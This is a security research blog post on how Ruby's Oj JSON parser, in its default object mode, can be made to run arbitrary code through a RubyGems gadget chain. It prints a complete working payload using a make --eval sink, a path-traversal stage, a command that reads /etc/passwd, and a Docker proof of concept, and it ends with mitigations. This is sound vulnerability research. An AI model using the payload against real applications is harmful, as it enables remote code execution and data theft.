Modifying the Ruby Oj.load Gadget Chain

Oj is the most popular high-performance JSON parser for Ruby, with over 170 million downloads. It's fast, well-maintained, and everywhere in production Rails apps. It's also, in its default configuration, a deserialization vulnerability.

A single Oj.load(user_input), with no flags and no explicit unsafe configuration, will instantiate arbitrary Ruby objects from JSON. Any endpoint that parses untrusted JSON through Oj's default mode is one crafted payload away from remote code execution.

Ruby deserialization has always been interesting to me, and I wanted to understand Oj's object mode well enough to build a gadget chain hands-on. There's already a known universal chain that achieves RCE through zip -TT. What I ended up with is a minor tweak to that same chain, swapping zip for make as the command execution sink. Nothing groundbreaking here, just notes from a learning exercise.

Background

Ruby developers generally know not to call Marshal.load or YAML.load on untrusted input. Those are documented footguns.

Oj doesn't trigger the same alarm bells. It's a JSON parser. JSON is a data interchange format: strings, numbers, booleans, arrays, objects. You expect hashes and arrays out the other end, not live Ruby objects.

That expectation is wrong when Oj operates in its default mode.

Object Mode

Oj supports several parsing modes: :strict, :null, :compat, :rails, :custom, and :object. The default, the one you get if you just call Oj.load, is :object. In this mode, Oj recognizes special JSON keys that tell it to instantiate Ruby classes:

^o - create an instance of the named class and set its instance variables
^c - reference a class object (the class itself, not an instance)
^#N - create a hash with non-string keys (N is the pair index)

In practice:

require "oj"

result = Oj.load('{"^o":"OpenStruct","table":{"admin":true}}')
# => #<OpenStruct admin=true>

result.class   # => OpenStruct
result.admin   # => true

That JSON string produced a real OpenStruct instance. Not a hash with a ^o key. An actual Ruby object with instance variables set.

How Oj constructs these objects matters:

Oj object construction vs normal Ruby

At the C level, it calls allocate() to create a blank instance, then rb_ivar_set() to assign instance variables directly. It never calls initialize, never calls marshal_load, never calls any Ruby-level constructor or validation.

The Trigger

Object instantiation alone isn't enough for RCE. You need a method call or side effect to fire during parsing, before the application touches the result.

^#N creates hashes with non-string keys:

Oj.load('{"^#1": [1, "one"]}')
# => {1 => "one"}

When Ruby inserts an object as a hash key, it calls .hash on that object to compute its bucket. If the key is an Array, Array#hash calls .hash on each element. This happens inside Oj.load itself, while the hash table is being built during deserialization.

So: put an Array as a hash key via ^#1, fill it with gadget objects, and Array#hash calls .hash on each one in sequence. No application code runs. The RCE fires during Oj.load before it returns.

Trigger mechanism: Array#hash fan-out

One thing that tripped me up: ^#N only supports a single key-value pair. {"^#1": [key, value]} works. {"^#2": [k1, v1, k2, v2]} throws Oj::ParseError. You pack all your gadgets into one Array key and let Array#hash fan them out.

The Existing Chain: zip -TT

The current universal gadget chain comes from GitHubSecurityLab's ruby-unsafe-deserialization research. It uses RubyGems classes, which ship with every Ruby installation. No additional gems needed beyond Oj.

The call chain through RubyGems internals:

Array#hash
  -> Gem::Requirement#hash
    -> walks @requirements
      -> Gem::RequestSet::Lockfile#to_s
        -> #add_GIT
          -> Gem::Source::Git#rev_parse
            -> Gem::Util.popen(@git, "rev-parse", @reference)
              -> IO.popen(["zip", "rev-parse", "-TmTT=<shell command>"])

Gem::Source::Git#rev_parse is meant to call git rev-parse to resolve a Git reference. But Oj lets us set @git to any string. Set it to "zip", and rev_parse calls Gem::Util.popen("zip", "rev-parse", @reference). The zip binary's -TT flag runs an arbitrary shell command, originally intended for testing archive integrity.

The payload has two stages. Stage 1 creates a cache directory that Gem::Source::Git expects to exist (via a Gem::Source + URI::HTTP path traversal). Stage 2 fires the actual command through zip. Both stages are elements of the same Array key, so Array#hash triggers them in sequence within a single Oj.load call.

$ docker run oj-poc

/tmp/oj_universal_proof: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:...

cat /etc/passwd > /tmp/oj_universal_proof ran as root inside the container, triggered by parsing a JSON string.

Swapping the Sink: make --eval

Getting to the make variant took a few wrong turns.

Dead End: ERB

First thing I tried was ERB. Oj can create an ERB instance and set @src to arbitrary Ruby code. Marshal can't do this at all; Marshal.dump on an ERB raises TypeError: singleton class can't be dumped. If you could trigger ERB#result, you'd get eval(@src) with whatever code you wanted.

Oj can create the object:

erb = Oj.load('{"^o":"ERB","src":"system(\'id\')"}')
erb.instance_variable_get(:@src)  # => "system('id')"

But ERB#result has a guard:

def result(b=new_toplevel)
  unless @_init.equal?(self.class.singleton_class)
    raise ArgumentError, "not initialized"
  end
  eval(@src, b, (@filename || '(erb)'), @lineno)
end

It checks that @_init is ERB.singleton_class. Oj's ^c syntax can give you the class ERB, but ERB.equal?(ERB.singleton_class) is false. They're different objects. There's no way in Oj's JSON syntax to reference a class's singleton class. Dead end.

I also looked for "bridge" classes, objects whose .hash or .to_s would call send or method_missing in a way that could bounce to ERB#result. Explored DRb::DRbUnknown, Bundler::Lockfile, UncaughtThrowError. Nothing panned out.

The make --eval Sink

What did work was swapping the command execution sink while keeping the same gadget chain up to Gem::Source::Git#rev_parse.

Sink swap: zip -TT vs make --eval

rev_parse calls:

Gem::Util.popen(@git, "rev-parse", @reference)
# which becomes:
IO.popen([@git, "rev-parse", @reference])

With @git = "make" and a crafted @reference:

IO.popen(["make", "rev-parse", "--eval=rev-parse:\n\t-id > /tmp/proof"])

GNU make's --eval flag accepts inline Makefile rules. The value rev-parse:\n\t-id > /tmp/proof (literal newline and tab) defines:

rev-parse:
	-id > /tmp/proof

The target name rev-parse matches the second argument to make, so it evaluates this rule and runs the recipe. The leading - suppresses errors.

The full payload:

{
  "^#1": [
    [
      // Element 0: trigger Gem autoloads
      {"^c": "Gem::SpecFetcher"},

      // Element 1 (Stage 1): create the cache directory via path traversal
      {"^o": "Gem::Requirement", "requirements": [
        ["~>", {"^o": "Gem::RequestSet::Lockfile",
          "set": {"^o": "Gem::RequestSet",
            "sorted_requests": [
              {"^o": "Gem::Resolver::IndexSpecification",
                "name": "name",
                "source": {"^o": "Gem::Source",
                  "uri": {"^o": "URI::HTTP",
                    "path": "/",
                    "scheme": "s3",
                    "host": "rubygems.org/quick/Marshal.4.8/bundler-2.2.27.gemspec.rz?",
                    "port": "/../../../../../../../../../../../../../../../tmp/cache/bundler/git/any-c5fe0200d1c7a5139bd18fd22268c4ca8bf45e90/",
                    "user": "user",
                    "password": "password"
                  },
                  "update_cache": true
                }
              }
            ]
          },
          "dependencies": []
        }]
      ]},

      // Element 2 (Stage 2): RCE via make --eval
      {"^o": "Gem::Requirement", "requirements": [
        ["~>", {"^o": "Gem::RequestSet::Lockfile",
          "set": {"^o": "Gem::RequestSet",
            "sorted_requests": [
              {"^o": "Gem::Resolver::SpecSpecification",
                "spec": {"^o": "Gem::Resolver::GitSpecification",
                  "source": {"^o": "Gem::Source::Git",
                    "git": "make",
                    "reference": "--eval=rev-parse:\n\t-id > /tmp/proof",
                    "root_dir": "/tmp",
                    "repository": "any",
                    "name": "any"
                  },
                  "spec": {"^o": "Gem::Resolver::Specification",
                    "name": "name",
                    "dependencies": []
                  }
                }
              }
            ]
          },
          "dependencies": []
        }]
      ]}
    ],
    "any"
  ]
}

The outer ^#1 creates a hash with a non-string key. The key is the inner Array. When Ruby hashes this Array, it calls .hash on each element in order: element 0 loads the Gem classes, element 1 creates the cache directory through a URI::HTTP path traversal, element 2 fires Gem::Source::Git#rev_parse with @git = "make".

The \n\t in the reference field are literal newline and tab characters in the JSON string. Oj parses them normally. By the time they reach IO.popen, make sees a valid inline rule definition.

$ docker run oj-poc ruby exploit_new_chain.rb

/tmp/oj_make_chain_proof:
uid=0(root) gid=0(root) groups=0(root)

make ships by default in the standard Ruby Docker images as part of the build toolchain. zip doesn't.

Oj vs Marshal: The Bypass Angle

Because Oj constructs objects via allocate() + rb_ivar_set() at the C level, it sidesteps every Ruby-level defense.

Gem::Version validates its input in initialize:

Gem::Version.new("not_a_version!!!")
# => ArgumentError: Malformed version number string not_a_version!!!

And marshal_load calls initialize, so Marshal deserialization hits the same validation:

def marshal_load(array)
  initialize array[0]
end

Oj skips both:

v = Oj.load('{"^o":"Gem::Version","version":"anything_goes_!!!"}')
v.instance_variable_get(:@version)
# => "anything_goes_!!!"

No error. The ivar is set to whatever was in the JSON.

Same story with ERB. Marshal can't even serialize it. Marshal.dump(ERB.new("test")) raises TypeError. But Oj creates an ERB instance with @src set to arbitrary code without blinking. The @_init guard in ERB#result prevents direct exploitation (as I found out), but the point is that Oj creates objects Marshal fundamentally cannot, with arbitrary ivar values. Any class that adds marshal_load guards as mitigation is not protected against Oj.

Running It

The whole PoC is one Ruby file and a Dockerfile:

FROM ruby:3.3
RUN gem install oj
WORKDIR /poc
COPY exploit.rb .
CMD ["ruby", "exploit.rb"]

docker build -t oj-poc .
docker run oj-poc

The fix is Oj.load(data, mode: :strict), Oj.safe_load(data), or just JSON.parse(data).

Oj's default mode turns JSON parsing into arbitrary object deserialization. This isn't a bug; it's documented behavior. But it violates a reasonable expectation that parsing JSON gives you data, not live objects.

Both chains shown here use only Ruby's standard library and RubyGems. No extra gems needed on the target. The make --eval variant shows that blocking the known zip -TT sink doesn't help. The attack surface is the deserialization primitive itself. As long as Oj.load instantiates arbitrary objects, there will be chains to find.

If you use Oj, audit every call site. If it touches untrusted data, pass mode: :strict.